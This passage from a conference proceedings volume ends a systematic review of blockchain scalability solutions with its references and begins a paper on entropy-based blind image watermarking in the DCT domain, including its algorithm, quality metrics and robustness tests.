and Ouroboros. Ouroboros can process 257.6 tps with 2 min confirmation time, and
Algorand can handle 875 tps with 22 s. This improves the throughput but it cannot
solve scalability challenge completely and it needs more solutions [15]. The sharding
category has solutions like Elastico, OmniLedger, RapidChain, and Monoxide [15].
A Systematic Review of Blockchain Technology to Find Current … 19
Sharding technique has parallel transaction verification mechanism that many trans-
actions verified at a same time which improves performance of the system. Zilliqa
is one solution using sharding method to improve performance and handles 1800
nodes with 1218 tps. It cannot give complete solution to scaling the blockchain but
it shows improvement when compared with Ethereum. Ethereum can handle 25,000
nodes with 15–20 tps [9]. Sharding technique uses parallel processing of transaction
which increases the throughput. This technique is also facing some challenges like
any attacker may take control on single shard then the data integrity is broken which
means 1% attack [16].
The directed acyclic graph (DAG) category has solutions like Inclusive, Spectre,
Phantom, Conflux, Dagcoin, IOTA, Byteball, and Nano. All these solutions try
to overcome scalability problem of blockchain, but are not enough to blockchain
completely scalable. This method has some limitations, and to overcome that chal-
lenges, it needs some more solutions [15]. Some solutions are using DAG method; one
of them is Tangle developed by IOTA is lightweight solution which does not contain
full copy of ledger. Bramas, Byteball, and Holochain are also based on DAG-based
solutions [17]. DAG and blockchain both storing the transactions in an open ledger.
The ledger maintaining method is different in both the approaches. The ledger of
blockchain has blocks that contain headers and transactions. On the other side, DAG
is storing the account’s transaction/balance history only. All network nodes are veri-
fying the transactions in blockchain-based platform. While in DAG-based platform,
transaction is valid if majority votes are in favor of that transaction. Decreasing block
size is the main approach of DAG technique. Many solutions use this method to scale
blockchain, and large number of investigations is going on but successful investiga-
tion does not prove yet [12]. DAG-based solutions have ledger security issues, and
decentralization of this technique is debatable which may prevent its growth [17].
The payment channel category having solutions like lightning network, DarcMatter
Coin (DMC), Raiden Network, and Sprites [15]. Lightning network has almost no
transaction fee and waiting time. It increases throughput and also minimizes the cost,
but it is the solution for payment channels with small amount of transactions. It cannot
process large payments and variety of transactions [16]. The Side-Chain category
having solutions like Pegged Sidechain, Plasma, and Liquidity Network [15]. Plasma
chain uses parent–child structure, that also improves the throughput but verification
of transaction is very expensive in parent–child structure [16]. The Cross-Chain
category has solutions like Cosmos and Polkadot [15]. The Off-Chain computation
category has solutions like Truebit and Arbiturm. All protocols or solutions are trying
to solve scalability challenge but all are facing some problems, and to solve their
limitations, they need more solutions [15].
20 B. K. Chauhan and D. B. Patel
Table 1 Blockchain platforms using different network, architecture and consensus mechanism
Platform Network type Architecture Consensus mechanism tps
Bitcoin Public Single chain PoW – – 7 tps
Ethereum Public Single chain PoW PoS – 15–20 tps
Hyperledger Private/Consortium Single chain PoET PBFT – 3500 tps
R3 corda Private/Consortium Single chain PBFT – – 15–1678 tps
Achain Public Parallel chain PoW PBFT PoS 1000 tps
Nxt Public/Consortium Single chain PoS – – 100 tps
Blockchain
Ardor Public/Consortium Parent–child PoS – – –
chain
Chain Core Private/Consortium Single chain PoA – – –
EOS Private – PoS PBFT – 3996 tps
IOTA Tangle Public DAG PoW – – 100–140 tps
Multichain Private Main chain, PoW – – 2000–2500
Off-chain tps
Quorums Private – PoS PBFT – –
Slimcoin Public/Private – PoB – – –
Tendermint Private/Consortium Single chain PoC – – 10,000 tps
A Systematic Review of Blockchain Technology to Find Current … 21
Block propagation time is closely related to network bandwidth. Node with higher
bandwidth gets a block sooner than a node with less bandwidth. The node with 500
Mbps bandwidth takes average 1.55 s to receive a block while node with 256 kbps
bandwidth takes 71.71 s on average. To optimize blockchain system, better neighbor
selection algorithm is used to reduce the block propagation time. The block propa-
gation time is the time needed for a miner to receive the new block. In Fastchain [23]
(a protocol to scale blockchain), lower bandwidth node sent block to higher band-
width node and then higher bandwidth node sent block to rest of the nodes. Miners
with limited bandwidth favor the node with higher bandwidth and disconnected them-
selves. Fastchain implementation is divided into bandwidth monitoring and neighbor
update phase. In bandwidth monitoring phase, each node maintains a latest band-
width table. In neighbor update phase, each miner periodically refreshes its neighbor
connections. NS3 simulator is used for experimentation, and in result, it increases
effective block rate (number of blocks added to chain) up to 40% and throughput
by 20–40% compared to bitcoin. This solution has some limitations. Each network
node has to maintain latest bandwidth table which periodically refreshes neighbor
connections for latest update. Miners with limited bandwidth are always dependent
on higher bandwidth node.
In PoW, if two miners solve the hash at the same time, in that case, blockchain
will add the block which is accepted by major node (at least 51%). Other miner who
put its resources to mine a block will be wasted. To overcome this problem, solo
mining is replaced by parallel mining [24]. Parallel mining required a manager to
ensure that no two miners use the same nonce value. The manager will distribute the
transaction hash and groups of nonces to each active miner. A miner who solves a
block would become a manager. GX library of Golang is used for experimentation,
and result shows the improvement in scalability of PoW up to 34% compared to
present situation. Some limitations show that miner with more processing power
will have the ability to calculate more nonce value, and it increases the probability
of becoming a manager. All miners have to depend on the manager to obtain a
transaction hash and nonces. If the manager goes offline or fails to respond, there
can be a single point of failure arise in this solution.
Sharding technique has three components: (1) assign node into shard; (2) intra-
shard consensus protocol; and (3) cross-shard transaction (to remove double-
spending problem). OmniLedger [25] has modified the Elastico sharding protocol
and tried to reduce the limitations of Elastico protocol. OmniLedger adopt unspent
transaction output (UTXO) model same as bitcoin. By combining ByzCoin and
PBFT, it introduced ByzCoinX consensus for shards. It combines RandHound with
Algorand that periodically rotates the set of validators. The role of validators is to
assign and verify the task of shards. OmniLedger solution also introduced Atomix
protocol that uses two-phase client-driven “lock/Unlock” for commit or rejection
of proof. OmniLedger uses anti-Sybil attack method to automatically handle cross-
shard transaction. Its dataset contains first 10,000 blocks of bitcoin blockchain. For
22 B. K. Chauhan and D. B. Patel
chain. The inspector node investigates such malicious activities going in the shard and
eliminates it. All the nodes reshuffle by random sampling method if any suspicious
activity found by an inspector node. The fund involved in malicious transaction is
transferred to the inspector node. This theory-based solution provides better security
of sharding-based blockchain applications.
The cross-shard transaction is the biggest challenge faced by sharding method
which increases the confirmation time. All shards that involve a cross-shard transac-
tion need to execute multiple-phase protocols to confirm the transaction authenticity.
Optchain [30] gives the solution to improve cross-shard transaction process. It opti-
mizes the placement of transactions into shard by random placement strategy and
modifies the simple payment verification protocol. PageRank analysis is used to place
transactions into the shard. The dataset contains first 10 million bitcoin transactions
(10,000,000). OverSim framework to simulate a system on OMNeT++ 4.6 is used
for experimentation. This protocol can process 6000 tps with 16 shards and takes
10.5 s confirmation time. This solution reduces the latency by 93% and increases the
throughput by 50% in comparison with the OmniLedger. Optchain compares with
only OmniLedger sharding protocol and predicts that it will give same result when
compared with other sharding protocols. It is implemented into existing wallet soft-
ware so it is useful for only payment module. This protocol improves cross-shard
transaction process. Remaining core component of sharding protocol: (1) assign
nodes into shard and (2) intra-shard consensus protocol are not included.
Ethereum introduced the concept of smart contract and decentralized applications
(Dapps). The on-chain execution of smart contract increases confirmation time that
degrades the system performance. This solution tries to execute smart contract in
on-chain and off-chain phase to check the performance of the system. This uses
hybrid-on/off-chain computation model, and it has plug-and-play solution approach
that is compatible with existing smart contract systems. Solidity language is used to
write smart contract. Kovan test network which is Ethereum’s official test network is
used for experimentation. This solution assumes that all the network node is honest
[31].
Hyperledger Fabric platform supports private and consortium blockchain network.
Hyperledger Fabric v.1.4 (latest version) [32] allows developers to select consensus
interface to provide an ordering service. The consensus interface is either Solo or
Kafka. It supports either LevelDB or CouchDB as state database options. Smart
contract can be written in language like Golang, JavaScript, and Java program-
ming. This study used solo (only one orderer) ordering service and CouchDB in the
deployment model. Smart contracts are written in JavaScript language. The entire
deployment installs and runs on the Linux–Ubuntu operating system. 1000 and 5000
transactions are generated for first and second round, respectively, for dataset. The
blockchain benchmark tool, Hyperledger Caliper, is used to evaluate result. Result of
this case study shows that Hyperledger Fabric handles up to 100,000 nodes (partic-
ipants) on the selected AWS EC2 instance. AWS is Amazon Web Services that
provides virtual machine on rent, and users can implement their applications on it.
24 B. K. Chauhan and D. B. Patel
The Hyperledger Fabric v.1.4 can process up to 200 tps with 0.01–0.16 s confirma-
tion time. The sharding protocol SSChain can handle more than 6500 tps with 1800
network nodes [33].
Proper partitioned is the first step in sharding technique, and if design of parti-
tioned is not systematic, the performance of system becomes degraded instead of
improvement. Ethereum blockchain is taken as graph to evaluate the partition. For
evaluation, five methods Hashing, Kernighan–Lin algorithm, METIS, R-METIS, and
TR-METIS are used. The matrices used for performance measurement are balance of
shards, transactions taking part in multiple shards and the amount of data that would
be relocated across shards upon repartitioning of the graph. The result shows that the
Hashing and Kernighan–Lin algorithm perform better partition. If sharding method
is implemented into Ethereum, it would change the design of blockchain [36]. Table
2 summarizes all the latest solutions with their used dataset, experimental device,
size of network, and result after evaluation.
The Internet of things (IoT) got more attention by academia, society, and industries.
As by using IoT, so many business processes, human activities, and services are
improved. It has some challenges which needs to be solved such as trust, security, and
overhead. It is expected that IoT ecosystem would become smarter and more efficient
using blockchain technology. IoT produces large number of data, and blockchain
can process limited number of transactions; so, in present situation, it is difficult for
blockchain to process the data produced by IoT [37]. Blockchain has enough capacity
to store important data in distributed and secure manner. Blockchain also gives surety
that data is original as a result it gives accurate data analysis if combined with big
data analysis [38]. Industrial development is dependent on reliable partnerships but its
growth is hindered due to increasing cybercrime and fraud. Blockchain can be more
useful to reduce these kinds of challenges. The industrial development would become
more improve by merging blockchain technology with IoT and cloud technology [5].
the real world. Smart contract is lines of code stored in blockchain and automati-
cally executes (self-verifying, self-executing, and tamper-resistant) when conditions
on that are satisfied. It is event-driven program that runs on blockchain platform,
and it does not need any kind of monitoring. The consensus protocol is used to
run sequence of events included in the smart contract. There are different kind of
consensus protocols introduced according to requirement of application, and in future
it may increase. The benefits of smart contract are real time, accurate, lower cost,
and time saving. Any application can be built without requirement of third party
by combining blockchain and smart contract and that is also reliable and secured.
Some use cases are supply chain, Internet of things, healthcare systems, digital right
management, insurance, financial sectors, and real estate [39]. Smart contract is in
its early stage, and before implementation, it is necessary to solve challenges like
scalability, flexibility, and security.
The cryptocurrency is not limited to bitcoin and Ethereum-based Ether, and in present
situation, hundreds of cryptocurrencies are introduced. It is necessary to design
blockchain testing mechanism to test the quality of different blockchain. The testing
mechanism could include standardization phase and testing phase. The standardiza-
tion phase would test the quality of blockchains. The new blockchain could actually
work as of the developer describe would be checked during standardization phase. In
testing phase, different criteria are used to test the performance of blockchain [38].
Implementation of blockchain has to give surety of security, privacy, high throughput,
and data integrity. However, these qualities set up a lot of challenges like scalability,
interoperability, cost-effectiveness, authentication, privacy, security that need to be
addressed [40]. Blockchain technology has many good features such as trusted, trans-
parency, automation, anonymity, security, auditability, and decentralization [11, 38].
Despite all these good qualities, its development is slowly growing due to scala-
bility problem. There are many studies and solutions conducted by researcher on
blockchain scalability. Nevertheless, some solutions give answer for only scalability
problem but is not covering decentralization and security part of blockchain [11].
Open-source platforms, Ethereum and Hyperledger, are helpful to build decentralized
application with public and private network type, respectively. Blockchain provides
security as it uses peer-to-peer network, distributed ledger, and asymmetric encryp-
tion. By implementing this technology, many sectors like financial sector, healthcare
service sector, mobile networking, and other sectors can be converted into secured
decentralized system from existing centralized system. The industries and business
sectors are interested in blockchain technology which can improve their existing
system [41, 42]. Despite the great curiosity of the business sector to implement this
technology into their business processes, insufficient answers of effectiveness of
A Systematic Review of Blockchain Technology to Find Current … 27
SWOT analysis used to show strength, weakness, opportunities, and threats side
of the blockchain technology. Fully transparent, without support of middleman,
traceable, tamper-free, higher efficient, lower risk, lower cost, decentralized,
distributed, immutable, secured reliable, accurate, trusted, and auditable are strength
of blockchain technology. Scalability, storage issue, cybersecurity, not fully devel-
oped, lack of standards, and lack governance are weaknesses. Automation, improve-
ment in supply chain, business process optimization, improve customer satisfaction
by transparency, innovate every industry, opportunities in IoT are its opportuni-
ties. It requires more research study that is included in threats of this technology
[43]. Research community needs to make detailed study and analysis in context of
scalability and security for rapid development in technological level [41].
6 Conclusion
After reviewing all the problems and solutions, we can come to the conclusion that
one needs to simulate the existing technology and check the performance for the
same. It needs to research the scalability challenge by changing conscience and
creating such smart contract or protocol level changes into technology which leads
to scale the limitation of the blockchain. Achieving this technology gives robust
application in many domains.
References
5. Ahram, T., Sargolzaei, A., Sargolzaei, S., Daniels, J., & Amaba, B. (2017). Blockchain
technology innovations. In 2017 IEEE technology & engineering management conference
(TEMSCON) (pp. 137–141). IEEE.
6. Ismail, L., & Materwala, H. (2019). A review of blockchain architecture and consensus
protocols: Use cases, challenges, and solutions. Symmetry, 11(10), 1198.
7. Lopes, J., & Pereira, J. L. (2019). Blockchain projects ecosystem: A review of current technical
and legal challenges. In World Conference on Information Systems and Technologies (pp. 83–
92). Cham: Springer.
8. Puthal, D., Malik, N., Mohanty, S. P., Kougianos, E., & Das, G. (2018). Everything you
wanted to know about the blockchain: Its promise, components, processes, and problems.
IEEE Consumer Electronics Magazine, 7(4), 6–14.
9. Mechkaroska, D., Dimitrova, V., & Popovska-Mitrovikj, A. (2018). Analysis of the possibil-
ities for improvement of Blockchain technology. In 2018 26th Telecommunications Forum
(TELFOR) (pp. 1–4). IEEE.
10. Executive Summary. (2019). NASSCOM Avasant India Blockchain Report.
11. Xie, J., Yu, F. R., Huang, T., Xie, R., Liu, J., & Liu, Y. (2019). A survey on the scalability of
blockchain systems. IEEE Network, 33(5), 166–173.
12. Benčić, F. M., & Žarko, I. P. (2018). Distributed ledger technology: Blockchain compared to
directed acyclic graph. In 2018 IEEE 38th International Conference on Distributed Computing
Systems (ICDCS) (pp. 1569–1570). IEEE.
13. Croman, K., Decker, C., Eyal, I., Gencer, A. E., Juels, A., Kosba, A., & Song, D. (2016). On
scaling decentralized blockchains. In International conference on financial cryptography and
data security (pp. 106–125). Berlin: Springer.
14. Zheng, P., Zheng, Z., Luo, X., Chen, X., & Liu, X. (2018). A detailed and real-time perfor-
mance monitoring framework for blockchain systems. In: 2018 IEEE/ACM 40th International
Conference on Software Engineering: Software Engineering in Practice Track (ICSE-SEIP)
(pp. 134–143). IEEE.
15. Zhou, Q., Huang, H., Zheng, Z., & Bian, J. (2020). Solutions to scalability of blockchain: A
survey. IEEE Access, 8, 16440–16455.
16. Kim, S., Kwon, Y., & Cho, S. (2018). A survey of scalability solutions on blockchain. In 2018
International Conference on Information and Communication Technology Convergence (ICTC)
(pp. 1204–1207). IEEE.
17. Holotescu, V., & Vasiu, R. (2020). Challenges and emerging solutions for public
blockchains. BRAIN: Broad Research in Artificial Intelligence and Neuroscience, 11(1), 58–83.
18. Guo, H., Zheng, H., Xu, K., Kong, X., Liu, J., Liu, F., & Gai, K. (2018). An improved consensus
mechanism for blockchain. In International Conference on Smart Blockchain (pp. 129–138).
Cham: Springer.
19. Salah, K., Rehman, M. H. U., Nizamuddin, N., & Al-Fuqaha, A. (2019). Blockchain for AI:
Review and open research challenges. IEEE Access, 7, 10127–10149.
20. Moezkarimi, Z., Abdollahei, F., & Arabsorkhi, A. (2019). Proposing a framework for evalu-
ating the blockchain platform. In 2019 5th International Conference on Web Research (ICWR)
(pp. 152–160). IEEE.
21. Clincy, V., & Shahriar, H. (2019). Blockchain development platform comparison. In 2019
IEEE 43rd Annual Computer Software and Applications Conference (COMPSAC) (Vol. 1,
pp. 922–923). IEEE.
22. Saraf, C., & Sabadra, S. (2018). Blockchain platforms: A compendium. In 2018 IEEE
International Conference on Innovative Research and Development (ICIRD) (pp. 1–6). IEEE.
23. Wang, K., & Kim, H. S. (2019). FastChain: Scaling blockchain system with informed neighbor
selection. In 2019 IEEE International Conference on Blockchain (Blockchain) (pp. 376–383).
IEEE.
24. Hazari, S. S., & Mahmoud, Q. H. (2019). A parallel proof of work to improve transaction speed
and scalability in blockchain systems. In 2019 IEEE 9th Annual Computing and Communication
Workshop and Conference (CCWC) (pp. 0916–0921). IEEE.
A Systematic Review of Blockchain Technology to Find Current … 29
25. Kokoris-Kogias, E., Jovanovic, P., Gasser, L., Gailly, N., Syta, E., & Ford, B. (2018).
Omniledger: A secure, scale-out, decentralized ledger via sharding. In 2018 IEEE Symposium
on Security and Privacy (SP) (pp. 583–598). IEEE.
26. Ren, Z., Cong, K., Aerts, T., de Jonge, B., Morais, A., & Erkin, Z. (2018). A scale-out blockchain
for value transfer with spontaneous sharding. In 2018 Crypto Valley Conference on Blockchain
Technology (CVCBT) (pp. 1–10). IEEE.
27. Yu, Y., Liang, R., & Xu, J. (2018). A scalable and extensible blockchain architecture. In 2018
IEEE International Conference on Data Mining Workshops (ICDMW) (pp. 161–163). IEEE.
28. Nadiya, U., Mutijarsa, K., & Rizqi, C. Y. (2018). Block summarization and compression
in bitcoin blockchain. In 2018 International Symposium on Electronics and Smart Devices
(ISESD) (pp. 1–4). IEEE.
29. Chauhan, A., Malviya, O. P., Verma, M., & Mor, T. S. (2018). Blockchain and scala-
bility. In 2018 IEEE International Conference on Software Quality, Reliability and Security
Companion (QRS-C) (pp. 122–128). IEEE.
30. Nguyen, L. N., Nguyen, T. D., Dinh, T. N., & Thai, M. T. (2019). OptChain: optimal transactions
placement for scalable blockchain sharding. In 2019 IEEE 39th International Conference on
Distributed Computing Systems (ICDCS) (pp. 525–535). IEEE.
31. Li, C., Palanisamy, B., & Xu, R. (2019). Scalable and privacy-preserving design of on/off-chain
smart contracts. In 2019 IEEE 35th International Conference on Data Engineering Workshops
(ICDEW) (pp. 7–12). IEEE.
32. Kuzlu, M., Pipattanasomporn, M., Gurses, L., & Rahman, S. (2019). Performance analysis of
a hyperledger fabric blockchain framework: Throughput, latency and scalability. In 2019 IEEE
International Conference on Blockchain (Blockchain) (pp. 536–540). IEEE.
33. Chen, H., & Wang, Y. (2019). SSChain: A full sharding protocol for public blockchain without
data migration overhead. Pervasive and Mobile Computing, 59, 101055.
34. Luu, L., Narayanan, V., Zheng, C., Baweja, K., Gilbert, S., & Saxena, P. (2016). A secure
sharding protocol for open blockchains. In Proceedings of the 2016 ACM SIGSAC Conference
on Computer and Communications Security (pp. 17–30).
35. Zamani, M., Movahedi, M., & Raykova, M. (2018). Rapidchain: Scaling blockchain via
full sharding. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and
Communications Security (pp. 931–948).
36. Fynn, E., & Pedone, F. (2018). Challenges and pitfalls of partitioning blockchains. In 2018 48th
Annual IEEE/IFIP International Conference on Dependable Systems and Networks Workshops
(DSN-W) (pp. 128–133). IEEE.
37. Cao, B., Li, Y., Zhang, L., Zhang, L., Mumtaz, S., Zhou, Z., & Peng, M. (2019). When Internet of
Things meets blockchain: Challenges in distributed consensus. IEEE Network, 33(6), 133–139.
38. Zheng, Z., Xie, S., Dai, H., Chen, X., & Wang, H. (2017). An overview of blockchain tech-
nology: Architecture, consensus, and future trends. In 2017 IEEE international congress on
big data (BigData congress) (pp. 557–564). IEEE
39. Mohanta, B. K., Panda, S. S., & Jena, D. (2018). An overview of smart contract and use cases in
blockchain technology. In 2018 9th International Conference on Computing, Communication
and Networking Technologies (ICCCNT) (pp. 1–4). IEEE.
40. Koteska, B., Karafiloski, E., & Mishev, A. (2017). Blockchain implementation quality chal-
lenges: A literature. In SQAMIA 2017: 6th workshop of software quality, analysis, monitoring,
improvement, and applications (pp. 11–13).
41. Sandner, P., & Schulden, P. M. (2019). Speciality grand challenges: Blockchain. Front
Blockchain, 2, 1.
42. Lu, Y. (2019). The blockchain: State-of-the-art and research challenges. Journal of Industrial
Information Integration, 15, 80–90.
43. Niranjanamurthy, M., Nithya, B. N., & Jagannatha, S. (2019). Analysis of blockchain
technology: Pros, cons and SWOT. Cluster Computing, 22(6), 14743–14757.
Secured Blind Image Watermarking
Using Entropy Technique in DCT
Domain
Abstract In the current situation, we can communicate sound, video and pictures
with the utmost ease. However, security and copyright of the media turned into a
significant issue, so a rising method, known as digital watermarking, is utilized for
shielding digital media from counterfeiting and unapproved use. In this paper, a
blind image watermarking technique is presented, which uses the entropy method
and watermark encryption with the predefined mathematical function to make the
process more robust, secure and imperceptible. A watermark is inserted in the DCT
domain, which facilitates robustness in bandpass filtering actualized channels. To
provide objective evidence of the performance, the performance measures peak signal
to noise ratio (PSNR) and normalized correlation (NC) are used. The method can
achieve greater than 40 dB PSNR value, and the NC values are in the range of 0.9–1.
The proposed technique has been actualized in MATLAB 2020a, and on testing, under
various attacks, the technique achieved a great balance between imperceptibility and
robustness.
1 Introduction
Digital Watermarking helps to protect digital media from counterfeiting and inap-
propriate use of data [1–3]. This technique has turned out to be successful, using the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 31
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_3
32 M. Gupta and R. Rama Kishore
watermarking technique which has helped in reducing the unfair distribution of the
data and violation of the copyright act [4, 5]. In this technique, we are able to get
a watermarked image by embedding secret information called a watermark on the
cover image [6, 7].
Earlier, the algorithms were used to embed and extract watermarks through spatial
approaches, like LSB (least significant bits) watermarking technique [8–10]. During
the process, the LSB of the cover image is used for watermarking. Algorithms based
on this method are not robust enough and can be disclosed through mathematical
analysis. Other refined algorithms embed watermark bits in frequency domains of the
image; for instance, [11–13] placed the watermark in their method at the frequency
spectrum to achieve high security and high reliability [14–16]. The algorithm is given
by Shih [17] which has increased the capacity of watermark’s frequency domain and
at the same time, it maintained the imperceptibility. Savakar [18] tried to maintain
the cover image statistics by using an embedding technique.
In the proposed watermarking technique, Shannon’s Entropy is used to find the
location which is more robust for inserting the watermark bits defined by Garg and
Kishore [19]. As the introduced algorithm is blind, the actual watermark and host
image are not required at the time of extraction. The discrete cosine transform is used
for embedding the domain.
The paper beneath is presented in multiple sections. Section 2 depicts a concise
summary of the work published in the domain of advanced digital watermarking
technique. Section 3 addresses the submitted digital image watermarking method.
Section 4 includes experimental results of the proposed work, and experimental
results are analysed to discover similarities and differences with the existing works.
Section 5 takes in the recapitulation of the proposed work.
2 Related Work
In the proposed work, DCT technique with entropy is used, so this section assesses
the work done in the field of digital watermarking using entropy methodology. N.
A. Loan [20] gave a digital image watermarking technique dependent on entropy to
enhance imperceptibility and robustness. One low-frequency watermark and another
high-frequency watermark is embedded in this technique [21, 22]. The region with
great entropy value is detected in the host image for embedding the watermark. DWT
and SVD put into application for inserting the watermark [23–26]. Yang et al. [27]
presented an information-masking model using the idea of entropy to advance the
robustness and imperceptibility in the temporal domain and spatial spectrum. Mehta
et al. [28] introduced an image watermarking method using block entropy where the
block of high entropy is used for inserting the watermark using LSB substitution
method.
Deljavan et al. [29] proposed a blind, HVS-based, transparent, scalable water-
marking algorithm, robust against scalable image coding based on DWT. The selected
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 33
coefficients in the high-frequency sub-bands are chosen for embedding the water-
mark upon analysing luminance, texture and contrast. Furthermore, selection of the
coefficient takes place through entropy and amplitude analysis. Application of multi-
levels of DWT on the watermark helps in scalable [30–32]. A representation of it,
and the host image has selected coefficients with DWT sub-bands for inserting the
decomposed watermark sub-bands [33, 34].
Garg and Kishore [35] applied entropy method to optimize the results; the water-
mark bits are embedded in the blocks of low entropy instead of embedding them
in the complete image. Experimental results show that their technique suffices both
the imperceptibility and robustness. Mohammed et al. [36] used HVS-based entropy
parameter for each block with DWT and SVD domain. The method asserts that
embedding watermark in these particular blocks provides more imperceptible and
robust results [37, 38]. Mehta et al. [39] adopted fuzzy entropy to embed the water-
mark bits. Fuzzy entropy is used to abandon the superfluous and inappropriate blocks
obliquely [40], and it helps to reduce the dimensionality of the watermark embedding
technique, and this provides better robustness property [41, 42].
Based on the papers mentioned above, which is concerned to watermark a
greyscale image, a block entropy-based digital watermarking technique is used. The
introduced technique inserts the watermark in selected segments of the greyscale
image instead of embedding the watermark in the complete host image. Segments
are selected based on entropy value. Watermark is inserted in the chosen segments by
using two DCT coefficients, it is required that the variation of these coefficients needs
to be fair and should be in the region of low frequency. The robustness increases with
the distance [43]. Watermark image is encrypted by bit-xor encryption technique,
and this increases the security because the attacker would not be able to draw out
the original watermark from the watermarked image [44]. Encrypted watermark is
placed in selected DCT coefficients such that watermark strength is adaptive for each
block which improves the watermark imperceptibility property.
The proposed digital image watermarking algorithm utilizes the concept of water-
mark encryption, entropy and DCT for inserting the watermark in the host picture.
DCT happens to be utilized to transform the image of the spatial domain over to
the frequency domain through the means of transforming the image in the form of
a cosine wave series at different frequencies. To optimize the results, the entropy of
every block is calculated. Furthermore, blocks are then arranged depending upon the
entropy values. The blocks with less entropy are used for embedding the watermark
[45]. Here, the method is adaptive as the embedding strength for each block changes
with the characteristics of the blocks. To attain more security, watermark encryption
is done using the predefined mathematical function. In this segment, the submitted
digital image watermarking technique is defined. It comprises the algorithm for
embedding the watermark which is covered in Sect. 3.1. Furthermore, algorithm for
34 M. Gupta and R. Rama Kishore
extracting the watermark is covered in Sect. 3.2, and their block diagrams are shown
in Figs. 1 and 2, respectively.
Step 1. Read the host image IMG and watermark image WM.
Step 2. Encrypt watermark with the predefined mathematical function.
The objective is to secure the watermark from attackers. It is arduous for attackers to
obtain the original watermark. The process of encryption is done using the predefined
mathematical function.
Step 3. Divide the Image IMG into non-overlapped 8 × 8 blocks.
Step 4. Calculate the Entropy of each block.
is the average of the uncertainty value in an image. The Shannon entropy of random
variable X is given by the following formula, where p(x) is the probability mass
function, whose value lies between 0 and 1. The value of −log p(x) represents the
information related to the single bit x. If the probability of the pixel is zero, then it
will not contribute to the entropy calculation, as 0 log 0 = 0. The higher the value of
entropy, the more information it stores.
H (X ) = − p(x) log p(x) (1)
x∈X
Step 6. The DCT value is calculated for each block and watermark is embedded in
two selected coefficients “bi” and “bj”.
Step 7. Compute watermark strength.
For embedding the watermark, its strength is adjusted on the basis of the mean of the
blocks. This keeps the strength of the watermark related to the local characteristics
of the block. Furthermore, it also helps to embed the watermark with a lesser impact
on the imperceptibility of the image.
The watermark strength Alpha is computed as the mean of the selected blocks.
n
dct(i, j)
Alpha = i=1
(2)
n
where “n” is block size, i and j are the positions of DCT coefficients in a block of
size 8 × 8.
Step 8. Embed watermark bits.
If watermark bit is one, then modify the selected coefficients in accordance with Eq. 3.
And if watermark bit is zero, then modify the selected coefficients in accordance with
Eq. 4.
bi = bi + Alpha ∗ μ
bj = bj − Alpha ∗ μ (3)
bi = bi − Alpha ∗ μ
bj = bj + Alpha ∗ μ (4)
Here “bi” and “bj” are the chosen DCT coefficients, μ is strength multiplier. When
wi = 1, watermark strength is added to the coefficient “bi” and subtracted from “bj”.
Furthermore, when wi = 0, watermark strength is subtracted from the coefficient
“bi” and added to “bj”. This makes “bi” greater if watermark bit is one and “bj”
greater if watermark bit is zero.
Step 9. Generate the Watermarked Image.
Combine all 8 × 8 blocks after modifications in the bits and apply inverse DCT to
generate the watermarked image.
Step 3: Calculate entropy of each block by applying the formula used for
embedding watermark, as presented in Eq. 1.
Step 4: Sort the blocks based on the entropy value in ascending order, to select
the blocks with low entropy value.
Step 5: Apply DCT transformation on each block using Eq. 2.
Step 6: Choose two coefficients “bi” and “bj” in each block using the predefined
mathematical function.
Step 7: If “bi” is greater than “bj”, bit one is extracted, and if “bj” is greater than
“bi ”, bit zero is extracted.
Step 8: The predefined mathematical function is employed to reconstruct the
watermark from the encrypted watermark.
For testing and evaluation of performance, PSNR, NC, SSIM and BER values are
used. These values helped to measure the quality of watermarking such as robustness
and imperceptibility.
PSNR (Peak Signal to Noise Ratio)
PSNR is used to compare the imperceptibility of the cover image and watermarked
image. It is expressed in terms of logarithmic decibel scale.
(L ∗ L)
PSNR = 10 log 10 (5)
MSE
Here, L betokens peak signal values for the cover image, and it is 255 for the 8-bit
image. For better imperceptibility, high PSNR is needed. MSE is applied to compare
the quality of the image after inserting the watermark. It is measured as cumulative
squared error between host image and watermarked image. Lesser the value of MSE,
better will be the results.
M,N [I1 (m, n) − I2 (m, n)]
2
MSE = (6)
M∗N
((2μx μy + c1 )(2σ x y + c2 ))
SSIM = 2 (8)
μx + μy 2 + c1 σ x 2 + σ y 2 + c2
At this place,
μx indicates average of x
μy indicates average of y
σx 2 indicates variance of x
σy2 indicates variance of y
σxy indicates covariance of x and y
cl = (k1 L)2 , c2 = (k2 L)2 the mentioned two variables stabilize the division by
the weak denominator
L indicates the dynamic range for the pixel value, and it is 2bits/pixel − 1
k 1 = 0.01 and k 2 = 0.03 by default.
Error Rate
BER = (9)
Size of Image
Cameraman 43.1369
Pepper 41.4201
Girl 43.3583
Barbara 41.4759
Chart Title
0.92
0.9
0.88
0.86
0.84
0.82
0.8
0.78
0.76
0.74
SSIM
Lena Barbara Pepper Girl Cameraman
Fig. 3 SSIM values for the original image and watermarked image
is varied. The results are shown through bar charts, covered between Figs. 4 and 9.
To check the robustness under the rotation attack, watermarked image is rotated by
−3 to + 3° with the increment of +1°. Results are shown in Fig. 4. On analysis, it
is apparent from the results that the minimum NC value is 0.97; it indicates good
imperceptibility. NC value decreases if the degree of rotation increases. Gaussian
noise is added to the image; the level of noise is varied from 1 to 5% with the
increment of 1%. NC value remains close to one with little to no change when the
noise is varied from 1 to 3%, and later with an increase in noise, NC value decreased.
Results are shown by the help of a bar chart in Fig. 5.
Robustness under the cropping attack is checked by cropping the watermark from
0 to 50% with the increment of 10%. The value of robustness (NC value) stays close
to one till 20% cropping. After 20% cropping, there is a decrease in NC value for
further increment in cropping. Figure 6 shows that the proposed method achieved
encouraging results. In order to figure out the robustness of the proposed method
under the JPEG compression attack, robustness is checked over different values
of quality factor. Quality factor (QF) shows the amount of information preserved
after compression. Greater QF value would mean more information is preserved
under compression attack. The value of NC is 1 for all the test images under the
compression attack while the range of QF is in between 100 and 60, and after that,
NC value decreases as QF decreases. Results are shown in Fig. 7.
The proposed method is calculated for robustness under the median filter attack.
The filter size is varied from 1 × 1 to 5 × 5. The minimum value of NC is more
than 0.95 under all the variations of the attack. Figure 8 shows the results of the
introduced method under this attack. Under Weiner filter attack, the value of NC
decreases when the filter size increases; the minimum value of NC is 0.95 for the
method. To calculate the robustness precisely, the filter size is varied from 1 × 1
